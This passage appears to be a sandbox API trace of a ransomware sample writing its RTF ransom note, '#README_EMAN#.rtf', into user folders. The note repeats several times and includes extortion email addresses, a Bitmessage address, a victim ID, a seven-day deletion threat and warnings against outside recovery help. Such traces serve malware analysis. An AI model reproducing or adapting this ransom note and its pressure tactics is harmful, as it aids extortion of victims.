stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.173] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x80'vפ\x12\\<{áUç\x9f¼\x87Kjx°ùld\x143\x0e", lpUsedDefaultChar=0x0) returned 8717 [0289.173] WriteFile (in: hFile=0x2ac, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.174] CloseHandle (hObject=0x2ac) returned 1 [0289.174] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0289.174] GetLastError () returned 0x2 [0289.174] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.182] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your 